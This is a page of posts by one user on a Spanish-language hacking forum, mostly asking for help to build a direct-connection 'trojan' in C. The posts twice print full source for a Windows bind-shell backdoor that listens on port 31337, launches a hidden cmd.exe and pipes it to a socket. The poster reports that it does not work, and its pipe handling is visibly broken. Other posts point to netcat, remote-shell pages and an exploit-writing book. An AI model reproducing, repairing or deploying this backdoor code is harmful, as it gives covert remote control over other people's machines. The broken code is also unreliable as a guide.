| |
|
1191
|
Programación / Programación C/C++ / Re: [C] Code troyano conexion directa
|
en: 9 Septiembre 2010, 19:35 pm
|
|
Si, perdona, no escribi la comprobacion de errores. Veran, un troyano si algo va mal no alerta al usuario diciendo "Hola soy un troyano, he fallado avisa a Pepito xD"
Lo escribi todo en la v2.0 k la publicare mañana tarde k ahora no puedo, pero se que ese no es el fallo pues todo se hace con normalidad en la otra, pero aun asi no va.
El cliente/server se hacerlo, pero no se usar correctamente las pipes. Alguien tiene un manual sencillito para aprender a usarlas? Tu manual me ha hecho ver la tecnica pero no se hacerlas bien....
Saludos y muchas gracias
|
|
|
|
|
1192
|
Programación / Programación C/C++ / Re: Win Backdoor Bind port
|
en: 8 Septiembre 2010, 13:25 pm
|
|
Buenas, se que este tema se ha pasado a la historia, pero me parece realmente bueno el code. Es mas limpio que el mio. Sin embargo, lo probe en Windows Vista SP2, y no funcionaba correctamente. No se habrian shells por ningun lado xD. Alguien sabe como arreglarlo? Digo que tube que usar socket y connect en vez de WinSocket y WinConnect porque ya no existen. Ya se que si usabas socket y connect no iba, pero es que con lo otro tampoco iba pork ya no existe y GCC desde linea de comandos no lo reconoce.
El code es realmente bueno, y quiero renovarlo, pues estoy trabajando en un troyano parecido a ese, y me gustaria sacar ideas. Como podria hacer que corra??
Por cierto, el mio usa lo mismo pero incluyendole pipes. Pueden verlo en otros posts.
|
|
|
|
|
1193
|
Programación / Programación C/C++ / [C] Code troyano conexion directa
|
en: 8 Septiembre 2010, 13:00 pm
|
Bueno, llevo mucho tiempo con este tema, y aun no lo he conseguido resolver. LLevo ya una semana buscando por el foro y googleando, pero no consigo encontrar ningun codigo en "C" de un troyano de conexion directa, para conseguir hacer yo uno, pues el de conex. inversa es realmente facil. Vosotros me aconsejasteis lo de las pipes, tuberias, pero no consigo que me funcione. He visto muchos codes de las pipes (" http://members.fortunecity.com/haxprt/casos_discucion/Servicio_Shell_Remota.html", si alguien kiere mirar) , pero no consigo que mi troyano funcione. He hecho varios codes, pero ninguno funciona.... Lo que os pido es que pongais aqui algunos codes de troyanos de conex. directa o hilos que no he conseguido encontrar... Si alguno quiere ver el codigo de las pipe que no va... #include <stdio.h> #include <stdlib.h> #include <winsock.h> HANDLE Out, In, Err; HANDLE hThread[3]; DWORD IDThread[3]; STARTUPINFO Stup; SOCKET newsock; SOCKET sockfd; DWORD WINAPI Lectura(LPVOID lpvThreadParm) { char buffer; unsigned long BytesRead; int n; while(1) { ReadFile(Out, &buffer, 1, &BytesRead, NULL); n= send(sockfd, &buffer, 1, 0); } return 0; } DWORD WINAPI Escritura(LPVOID lpvThreadParm) { char buffer; unsigned long BytesRead; int n; while(1) { ReadFile(In, &buffer, 1, &BytesRead, NULL); n= send(sockfd, &buffer, 1, 0); } return 0; } DWORD WINAPI LecturaError(LPVOID lpvThreadParm) { char buffer; unsigned long BytesRead; int n; while(1) { ReadFile(Err, &buffer, 1, &BytesRead, NULL); n= send(sockfd, &buffer, 1, 0); } return 0; } int ShellCode () { CreatePipe (&Out, &Out, NULL, 0); CreatePipe (&In, &In, NULL, 0); CreatePipe (&Err, &Err, NULL, 0); Stup.cb=sizeof (Stup); Stup.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW; Stup.wShowWindow = 0; Stup.hStdOutput = Out; Stup.hStdError = Err; Stup.hStdInput = In; CreateProcess (NULL, "command.com", NULL, NULL, 0, 0, NULL, NULL, &Stup, NULL); hThread[0] = CreateThread(NULL, 0, Lectura, NULL, 0, &IDThread[0]); hThread[1] = CreateThread(NULL, 0, LecturaError, NULL, 0, &IDThread[1]); hThread[2] = CreateThread(NULL, 0, Escritura, NULL, 0, &IDThread[2]); WaitForMultipleObjects( 3, hThread, TRUE, INFINITE); CloseHandle(hThread[0]); CloseHandle(hThread[1]); CloseHandle(hThread[2]); } int main () { WSADATA wsaData; WSAStartup(MAKEWORD(2, 0), &wsaData); struct sockaddr_in host, client; int a=sizeof (struct sockaddr); sockfd=socket (2, 1, 0); host.sin_family=AF_INET; host.sin_addr.s_addr=0; host.sin_port=htons (31337); bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr)); listen (sockfd, 1); while (1) { newsock=accept (sockfd, (struct sockaddr*)&client, &a); ShellCode (); closesocket (newsock); } closesocket (sockfd); return 0; }
Producto de el vinculo de antes. No funciona correctamente. Si alguno tiene sugerencias, codes buenos, o vinculos interesantes, que, por favor, los publique aqui lo antes posible. Muchas gracias a todos. |
|
|
|
|
1194
|
Programación / Programación C/C++ / Re: duda, perdon recien empiezo!!!
|
en: 7 Septiembre 2010, 11:35 am
|
#include <stdio.h> int main(int argc, char *argv []) { int numero; if (argc==2) else { } printf("El cuadrado de %d es %d.\n", numero , numero *numero ); return 0; }
Bueno, code mas simple y organizado. Aconstumbrate a escribirlo asi... Y para ahorrar espacio, es mejor asi el printf. Con ints te ira mejor. Eternal Idol, ahora que me acuerdo, pork es mejor escribir gets y sscanf? asi para el int va mejor no? |
|
|
|
|
1197
|
Programación / Programación C/C++ / Re: Que funcion puedo usar?
|
en: 6 Septiembre 2010, 11:41 am
|
Bueno, he probado las dos soluciones, pero desgraciadamente no puedo con ninguna de las dos. Las pipes son interesantes, pero no se como hacerlas funcionar en mi favor. Si alguno sabe como usarlas, con un code, k me lo diga por favor. Sobre lo del NC, lo de troyanizando netcat me parece mas de lammer que de alguien k kiere aprender. Sera un manual util, pero no busco meterme en el ordenador de otra persona, si no hacer un troyano de conexion directa, pues ya he hecho el de conex. inversa, k veo realmente simple. Sigo pensando en lo de las pipes, pero necesito una manita xD!!! A la vez busco un troyano en C de conex. directa. Vi uno que usaba pipes tambien, pero no se donde esta. Seguire buscando. Muxas gracias El code: #include <stdio.h> #include <stdlib.h> #include <winsock.h> HANDLE Out, In, Err; HANDLE hThread[3]; DWORD IDThread[3]; STARTUPINFO Stup; SOCKET newsock; SOCKET sockfd; DWORD WINAPI Lectura(LPVOID lpvThreadParm) { char buffer; unsigned long BytesRead; int n; while(1) { ReadFile(Out, &buffer, 1, &BytesRead, NULL); n= send(sockfd, &buffer, 1, 0); } return 0; } DWORD WINAPI Escritura(LPVOID lpvThreadParm) { char buffer; unsigned long BytesRead; int n; while(1) { ReadFile(In, &buffer, 1, &BytesRead, NULL); n= send(sockfd, &buffer, 1, 0); } return 0; } DWORD WINAPI LecturaError(LPVOID lpvThreadParm) { char buffer; unsigned long BytesRead; int n; while(1) { ReadFile(Err, &buffer, 1, &BytesRead, NULL); n= send(sockfd, &buffer, 1, 0); } return 0; } int ShellCode () { CreatePipe (&Out, &Out, NULL, 0); CreatePipe (&In, &In, NULL, 0); CreatePipe (&Err, &Err, NULL, 0); Stup.cb=sizeof (Stup); Stup.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW; Stup.wShowWindow = 0; Stup.hStdOutput = Out; Stup.hStdError = Err; Stup.hStdInput = In; CreateProcess (NULL, "cmd.exe", NULL, NULL, 0, 0, NULL, NULL, &Stup, NULL); hThread[0] = CreateThread(NULL, 0, Lectura, NULL, 0, &IDThread[0]); hThread[1] = CreateThread(NULL, 0, LecturaError, NULL, 0, &IDThread[1]); hThread[2] = CreateThread(NULL, 0, Escritura, NULL, 0, &IDThread[2]); WaitForMultipleObjects( 3, hThread, TRUE, INFINITE); CloseHandle(hThread[0]); CloseHandle(hThread[1]); CloseHandle(hThread[2]); } int main () { WSADATA wsaData; WSAStartup(MAKEWORD(2, 0), &wsaData); struct sockaddr_in host, client; int a=sizeof (struct sockaddr); sockfd=socket (2, 1, 0); host.sin_family=AF_INET; host.sin_addr.s_addr=0; host.sin_port=htons (31337); bind (sockfd, (struct sockaddr*)&host, sizeof (struct sockaddr)); listen (sockfd, 1); while (1) { newsock=accept (sockfd, (struct sockaddr*)&client, &a); ShellCode (); closesocket (newsock); } closesocket (sockfd); return 0; }
Va bien y sin warnings pero falla cuando te conectas. No hace nada! |
|
|
|
|
1198
|
Programación / Programación C/C++ / Que funcion puedo usar?
|
en: 4 Septiembre 2010, 17:00 pm
|
|
Buenas, pues estaba pensando en como abrir una cmd remota a traves de un troyano. Al principio pense en dup2, pero no me funcionaba correctamente. Se hacer un troyano inverso, pero quiero hacer un de conex. directa: Cuando me conecte, que me salte una cmd remota. Pero no se exactamente como hacerlo. Uso sockets en C.
Espero sus respuestas y sugerencias. Saludos y gracias
|
|
|
|
|
1199
|
Seguridad Informática / Hacking / Re: Netcat en Ubuntu
|
en: 3 Septiembre 2010, 12:21 pm
|
|
El netcat viene preinstalado en Ubuntu. Para ver las opciones, "nc --help".
Tiene muchisimos usos. La lista que sale esta en ingles. Googlea que hay muchos manuales de netcat.
|
|
|
|
|
1200
|
Programación / Programación C/C++ / Re: Duda con %i
|
en: 3 Septiembre 2010, 11:46 am
|
|
En un libro salia como corromper la memoria correctamente para hacer saltar a otra direccion el programa. El libro esta bastante bien para los que quieren aprender algo sobre el hacking de antes en el que no se usaban programas descargados de tal hacker. Buenos tiempos xD.
El libro te enseña a programar en C, con buenas clases de ensamblador a las que hay que estar muy atento, a usar los sockets, con su ejemplo de servidor escrito 100% a mano y legible xD, a programar shellcodes, buscar fallos y crearles los exploits necesarios, etc. Es el mejor libro de hacking que he leido nunca xD.
Se llama Hacking. Técnicas fundamentales, de Anaya.
Si quereis hacer algo en serio, teneis el espiritu y las ganas, miradlo muy bien, porque es increible.
|
|
|
|
|
|
| |
|
Mostrar Mensajes
